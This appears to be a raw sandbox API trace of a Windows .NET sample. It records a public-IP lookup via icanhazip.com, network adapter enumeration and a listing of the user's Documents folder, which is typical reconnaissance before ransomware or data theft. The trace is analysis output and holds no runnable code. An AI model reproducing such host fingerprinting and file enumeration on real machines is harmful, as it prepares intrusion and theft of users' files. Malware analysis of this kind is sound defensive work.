[0150.468] LoadStringW (in: hInstance=0x9a0001, uID=0x29f, lpBuffer=0x7420b8, cchBufferMax=500 | out: lpBuffer="AUS Eastern Daylight Time") returned 0x19 [0150.468] CoTaskMemFree (pv=0x7420b8) [0150.468] FreeLibrary (hLibModule=0x9a0001) returned 1 [0150.469] RegCloseKey (hKey=0x1e0) returned 0x0 [0150.469] SetEvent (hEvent=0x37c) returned 1 [0150.485] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x2ee7b0 | out: pFixedInfo=0x0, pOutBufLen=0x2ee7b0) returned 0x6f [0150.720] LocalAlloc (uFlags=0x0, uBytes=0x248) returned 0x7420b8 [0150.720] GetNetworkParams (in: pFixedInfo=0x7420b8, pOutBufLen=0x2ee7b0 | out: pFixedInfo=0x7420b8, pOutBufLen=0x2ee7b0) returned 0x0 [0150.732] LocalFree (hMem=0x7420b8) returned 0x0 [0150.733] CoTaskMemAlloc (cb=0x20e) returned 0x7bf458 [0150.733] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_Disabled", lpBuffer=0x7bf458, nSize=0x105 | out: lpBuffer="₸tᑐtC:\\Windows\\system32\\DNSAPI.dll") returned 0x0 [0150.733] CoTaskMemFree (pv=0x7bf458) [0150.733] CoTaskMemAlloc (cb=0x20e) returned 0x7bf458 [0150.733] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_MinCount", lpBuffer=0x7bf458, nSize=0x105 | out: lpBuffer="₸tᑐtC:\\Windows\\system32\\DNSAPI.dll") returned 0x0 [0150.733] CoTaskMemFree (pv=0x7bf458) [0150.736] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x49c [0150.737] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x498 [0150.738] GetAddrInfoW (in: pNodeName="icanhazip.com", pServiceName=0x0, pHints=0x2ee6a0*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x2ee648 | out: ppResult=0x2ee648*=0x8e24978*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="icanhazip.com", ai_addr=0x8e24a70*(sa_family=2, sin_port=0x0, sin_addr="104.20.16.242"), ai_next=0x8e249a0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8e249c8*(sa_family=2, sin_port=0x0, sin_addr="104.20.17.242"), ai_next=0x0))) returned 0 [0151.075] FreeAddrInfoW (pAddrInfo=0x8e24978*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="icanhazip.com", ai_addr=0x8e24a70*(sa_family=2, sin_port=0x0, sin_addr="104.20.16.242"), ai_next=0x8e249a0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8e249c8*(sa_family=2, sin_port=0x0, sin_addr="104.20.17.242"), ai_next=0x0))) [0151.126] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4a4 [0151.126] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4ac [0151.126] ioctlsocket (in: s=0x4a4, cmd=-2147195266, argp=0x2ee678 | out: argp=0x2ee678) returned 0 [0151.126] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4b0 [0151.127] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4b4 [0151.127] ioctlsocket (in: s=0x4b0, cmd=-2147195266, argp=0x2ee678 | out: argp=0x2ee678) returned 0 [0151.127] WSAIoctl (in: s=0x4a4, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x2ee660, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x2ee660, lpOverlapped=0x0) returned -1 [0151.127] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x2ee390, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0151.127] WSAEventSelect (s=0x4a4, hEventObject=0x4ac, lNetworkEvents=512) returned 0 [0151.127] WSAIoctl (in: s=0x4b0, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x2ee660, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x2ee660, lpOverlapped=0x0) returned -1 [0151.127] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x2ee390, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0151.127] WSAEventSelect (s=0x4b0, hEventObject=0x4b4, lNetworkEvents=512) returned 0 [0151.127] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0x2ee65c*=0x0 | out: AdapterAddresses=0x0, SizePointer=0x2ee65c*=0xa5c) returned 0x6f [0151.133] LocalAlloc (uFlags=0x0, uBytes=0xa5c) returned 0x7c1838 [0151.133] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x7c1838, SizePointer=0x2ee65c*=0xa5c | out: AdapterAddresses=0x7c1838*(Alignment=0xe00000178, Length=0x178, IfIndex=0xe, Next=0x7c1afc, AdapterName="{208C2C2F-ECA0-4B34-8C2D-83B1FBC25E0D}", FirstUnicastAddress=0x7c1a70, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) PRO/1000 MT Network Connection #2", FriendlyName="Local Area Connection 2", PhysicalAddress=([0]=0x0, [1]=0xc0, [2]=0x7b, [3]=0x5c, [4]=0xcf, [5]=0x6d, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x3e5, DdnsEnabled=0x3e5, RegisterAdapterSuffix=0x3e5, Dhcpv4Enabled=0x3e5, ReceiveOnly=0x3e5, NoMulticast=0x3e5, Ipv6OtherStatefulConfig=0x3e5, NetbiosOverTcpipEnabled=0x3e5, Ipv4Enabled=0x3e5, Ipv6Enabled=0x3e5, Ipv6ManagedAddressConfigurationSupported=0x3e5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0xe, ZoneIndices=([0]=0xe, [1]=0xe, [2]=0xe, [3]=0xe, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6000007000000, Dhcpv4Server.lpSockaddr=0x7c19b0*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11de7039846ee341, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x20, [5]=0xc7, [6]=0x5c, [7]=0xa7, [8]=0xc4, [9]=0x3d, [10]=0xc7, [11]=0x58, [12]=0x4a, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x11c43dc7, FirstDnsSuffix=0x0), SizePointer=0x2ee65c*=0xa5c) returned 0x0 [0151.141] LocalFree (hMem=0x7c1838) returned 0x0 [0151.143] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ee670 | out: phkResult=0x2ee670*=0x4b8) returned 0x0 [0151.143] RegQueryValueExW (in: hKey=0x4b8, lpValueName="HWRPortReuseOnSocketBind", lpReserved=0x0, lpType=0x2ee68c, lpData=0x0, lpcbData=0x2ee688*=0x0 | out: lpType=0x2ee68c*=0x0, lpData=0x0, lpcbData=0x2ee688*=0x0) returned 0x2 [0151.143] RegCloseKey (hKey=0x4b8) returned 0x0 [0151.144] WSAConnect (in: s=0x49c, name=0x2278980*(sa_family=2, sin_port=0x50, sin_addr="104.20.16.242"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0151.291] closesocket (s=0x498) returned 0 [0151.294] send (s=0x49c, buf=0x2279600*, len=63, flags=0) returned 63 [0151.295] setsockopt (s=0x49c, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0 [0151.295] recv (in: s=0x49c, buf=0x2274920, len=4096, flags=0 | out: buf=0x2274920*) returned 731 [0151.359] setsockopt (s=0x49c, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0151.359] SetEvent (hEvent=0x37c) returned 1 [0151.419] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee8f8) returned 1 [0151.419] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0151.420] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", nBufferLength=0x105, lpBuffer=0x2ee3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpFilePart=0x0) returned 0x28 [0151.421] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x2ee620 | out: lpFindFileData=0x2ee620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdaf72c80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdaf72c80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x777e58 [0151.423] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdaf72c80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdaf72c80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.424] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa3d23d0, ftCreationTime.dwHighDateTime=0x1d58c7a, ftLastAccessTime.dwLowDateTime=0x1f872b00, ftLastAccessTime.dwHighDateTime=0x1d5a1f1, ftLastWriteTime.dwLowDateTime=0x1f872b00, ftLastWriteTime.dwHighDateTime=0x1d5a1f1, nFileSizeHigh=0x0, nFileSizeLow=0x2d01, dwReserved0=0x0, dwReserved1=0x0, cFileName="-60II61Ak.xlsx", cAlternateFileName="-60II6~1.XLS")) returned 1 [0151.424] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fd76690, ftCreationTime.dwHighDateTime=0x1d5d008, ftLastAccessTime.dwLowDateTime=0x456122f0, ftLastAccessTime.dwHighDateTime=0x1d55e0c, ftLastWriteTime.dwLowDateTime=0x456122f0, ftLastWriteTime.dwHighDateTime=0x1d55e0c, nFileSizeHigh=0x0, nFileSizeLow=0xbc5f, dwReserved0=0x0, dwReserved1=0x0, cFileName="3JvcF.xlsx", cAlternateFileName="3JVCF~1.XLS")) returned 1 [0151.424] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcbec050, ftCreationTime.dwHighDateTime=0x1d5e18b, ftLastAccessTime.dwLowDateTime=0x685d6430, ftLastAccessTime.dwHighDateTime=0x1d5e7dc, ftLastWriteTime.dwLowDateTime=0x685d6430, ftLastWriteTime.dwHighDateTime=0x1d5e7dc, nFileSizeHigh=0x0, nFileSizeLow=0x12aa6, dwReserved0=0x0, dwReserved1=0x0, cFileName="6OpWlEN8bGay.pps", cAlternateFileName="6OPWLE~1.PPS")) returned 1 [0151.424] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x719de1a0, ftCreationTime.dwHighDateTime=0x1d5d049, ftLastAccessTime.dwLowDateTime=0xcc966530, ftLastAccessTime.dwHighDateTime=0x1d5b1ab, ftLastWriteTime.dwLowDateTime=0xcc966530, ftLastWriteTime.dwHighDateTime=0x1d5b1ab, nFileSizeHigh=0x0, nFileSizeLow=0x3903, dwReserved0=0x0, dwReserved1=0x0, cFileName="8WUYgnmVVQsOHl.pptx", cAlternateFileName="8WUYGN~1.PPT")) returned 1 [0151.424] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x767d9620, ftCreationTime.dwHighDateTime=0x1d5695b, ftLastAccessTime.dwLowDateTime=0xd6a1ad90, ftLastAccessTime.dwHighDateTime=0x1d5c2a5, ftLastWriteTime.dwLowDateTime=0xd6a1ad90, ftLastWriteTime.dwHighDateTime=0x1d5c2a5, nFileSizeHigh=0x0, nFileSizeLow=0xd9da, dwReserved0=0x0, dwReserved1=0x0, cFileName="9BNDTe04t.docx", cAlternateFileName="9BNDTE~1.DOC")) returned 1 [0151.425] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb814a740, ftCreationTime.dwHighDateTime=0x1d5cc57, ftLastAccessTime.dwLowDateTime=0x355e24e0, ftLastAccessTime.dwHighDateTime=0x1d57ab1, ftLastWriteTime.dwLowDateTime=0x355e24e0, ftLastWriteTime.dwHighDateTime=0x1d57ab1, nFileSizeHigh=0x0, nFileSizeLow=0x19d3, dwReserved0=0x0, dwReserved1=0x0, cFileName="9sF-lI.xlsx", cAlternateFileName="9SF-LI~1.XLS")) returned 1 [0151.425] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x416765b0, ftCreationTime.dwHighDateTime=0x1d5e156, ftLastAccessTime.dwLowDateTime=0x65a90080, ftLastAccessTime.dwHighDateTime=0x1d5d960, ftLastWriteTime.dwLowDateTime=0x65a90080, ftLastWriteTime.dwHighDateTime=0x1d5d960, nFileSizeHigh=0x0, nFileSizeLow=0x11ec5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ar_xRF-J11M00dg.ots", cAlternateFileName="AR_XRF~1.OTS")) returned 1 [0151.425] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bbbf5c0, ftCreationTime.dwHighDateTime=0x1d5e6e9, ftLastAccessTime.dwLowDateTime=0x6418b050, ftLastAccessTime.dwHighDateTime=0x1d5e705, ftLastWriteTime.dwLowDateTime=0x6418b050, ftLastWriteTime.dwHighDateTime=0x1d5e705, nFileSizeHigh=0x0, nFileSizeLow=0xb03, dwReserved0=0x0, dwReserved1=0x0, cFileName="b3zzTQNH7.ods", cAlternateFileName="B3ZZTQ~1.ODS")) returned 1 [0151.425] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8f4aa70, ftCreationTime.dwHighDateTime=0x1d5e44d, ftLastAccessTime.dwLowDateTime=0x26f80310, ftLastAccessTime.dwHighDateTime=0x1d5e1f6, ftLastWriteTime.dwLowDateTime=0x26f80310, ftLastWriteTime.dwHighDateTime=0x1d5e1f6, nFileSizeHigh=0x0, nFileSizeLow=0x1974, dwReserved0=0x0, dwReserved1=0x0, cFileName="CjUJmtsyr.odt", cAlternateFileName="CJUJMT~1.ODT")) returned 1 [0151.425] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcc9239a0, ftCreationTime.dwHighDateTime=0x1d5e668, ftLastAccessTime.dwLowDateTime=0x58812d0, ftLastAccessTime.dwHighDateTime=0x1d5e69f, ftLastWriteTime.dwLowDateTime=0x58812d0, ftLastWriteTime.dwHighDateTime=0x1d5e69f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DDkKzEBB5Hx30VX7FT", cAlternateFileName="DDKKZE~1")) returned 1 [0151.425] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0151.425] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb81a750, ftCreationTime.dwHighDateTime=0x1d5dc6d, ftLastAccessTime.dwLowDateTime=0x77fc4040, ftLastAccessTime.dwHighDateTime=0x1d57d7a, ftLastWriteTime.dwLowDateTime=0x77fc4040, ftLastWriteTime.dwHighDateTime=0x1d57d7a, nFileSizeHigh=0x0, nFileSizeLow=0x118f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="ecol784pYTNNS.docx", cAlternateFileName="ECOL78~1.DOC")) returned 1 [0151.425] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84b0320, ftCreationTime.dwHighDateTime=0x1d5db09, ftLastAccessTime.dwLowDateTime=0xfda80a0, ftLastAccessTime.dwHighDateTime=0x1d5dfcf, ftLastWriteTime.dwLowDateTime=0xfda80a0, ftLastWriteTime.dwHighDateTime=0x1d5dfcf, nFileSizeHigh=0x0, nFileSizeLow=0x7407, dwReserved0=0x0, dwReserved1=0x0, cFileName="EUeaVFPg9xvOeyoTY.xlsx", cAlternateFileName="EUEAVF~1.XLS")) returned 1 [0151.426] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa180a720, ftCreationTime.dwHighDateTime=0x1d5e4be, ftLastAccessTime.dwLowDateTime=0xccf441f0, ftLastAccessTime.dwHighDateTime=0x1d5e5c7, ftLastWriteTime.dwLowDateTime=0xccf441f0, ftLastWriteTime.dwHighDateTime=0x1d5e5c7, nFileSizeHigh=0x0, nFileSizeLow=0x1766a, dwReserved0=0x0, dwReserved1=0x0, cFileName="gke7Hh05Yah.pdf", cAlternateFileName="GKE7HH~1.PDF")) returned 1 [0151.426] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c949040, ftCreationTime.dwHighDateTime=0x1d5e0fb, ftLastAccessTime.dwLowDateTime=0x69bbdae0, ftLastAccessTime.dwHighDateTime=0x1d5df59, ftLastWriteTime.dwLowDateTime=0x69bbdae0, ftLastWriteTime.dwHighDateTime=0x1d5df59, nFileSizeHigh=0x0, nFileSizeLow=0x60a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="GQnlDqiYaM01tswsYqy.pdf", cAlternateFileName="GQNLDQ~1.PDF")) returned 1 [0151.426] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbbab7d0, ftCreationTime.dwHighDateTime=0x1d5d857, ftLastAccessTime.dwLowDateTime=0x319e110, ftLastAccessTime.dwHighDateTime=0x1d5d83d, ftLastWriteTime.dwLowDateTime=0x319e110, ftLastWriteTime.dwHighDateTime=0x1d5d83d, nFileSizeHigh=0x0, nFileSizeLow=0x149a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="I9b4Uj.doc", cAlternateFileName="")) returned 1 [0151.426] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3789e7e0, ftCreationTime.dwHighDateTime=0x1d597e4, ftLastAccessTime.dwLowDateTime=0x9b276270, ftLastAccessTime.dwHighDateTime=0x1d5a5de, ftLastWriteTime.dwLowDateTime=0x9b276270, ftLastWriteTime.dwHighDateTime=0x1d5a5de, nFileSizeHigh=0x0, nFileSizeLow=0x6582, dwReserved0=0x0, dwReserved1=0x0, cFileName="KWnLqD jTsie6.docx", cAlternateFileName="KWNLQD~1.DOC")) returned 1 [0151.426] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12b6c3b0, ftCreationTime.dwHighDateTime=0x1d55cf8, ftLastAccessTime.dwLowDateTime=0xb144db60, ftLastAccessTime.dwHighDateTime=0x1d59c0f, ftLastWriteTime.dwLowDateTime=0xb144db60, ftLastWriteTime.dwHighDateTime=0x1d59c0f, nFileSizeHigh=0x0, nFileSizeLow=0xd9f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="mjKxv.pptx", cAlternateFileName="MJKXV~1.PPT")) returned 1 [0151.426] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0151.426] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0151.427] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0151.427] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0151.427] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d2692b0, ftCreationTime.dwHighDateTime=0x1d5dc22, ftLastAccessTime.dwLowDateTime=0xb246da30, ftLastAccessTime.dwHighDateTime=0x1d5e41d, ftLastWriteTime.dwLowDateTime=0xb246da30, ftLastWriteTime.dwHighDateTime=0x1d5e41d, nFileSizeHigh=0x0, nFileSizeLow=0x116b5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ndCXgWoaW3O_s9.doc", cAlternateFileName="NDCXGW~1.DOC")) returned 1 [0151.427] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ca82830, ftCreationTime.dwHighDateTime=0x1d5d995, ftLastAccessTime.dwLowDateTime=0x8df1c010, ftLastAccessTime.dwHighDateTime=0x1d5e0de, ftLastWriteTime.dwLowDateTime=0x8df1c010, ftLastWriteTime.dwHighDateTime=0x1d5e0de, nFileSizeHigh=0x0, nFileSizeLow=0x691d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Nhxbjjn.pptx", cAlternateFileName="NHXBJJ~1.PPT")) returned 1 [0151.427] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81b50e70, ftCreationTime.dwHighDateTime=0x1d55c85, ftLastAccessTime.dwLowDateTime=0x15a3a600, ftLastAccessTime.dwHighDateTime=0x1d57608, ftLastWriteTime.dwLowDateTime=0x15a3a600, 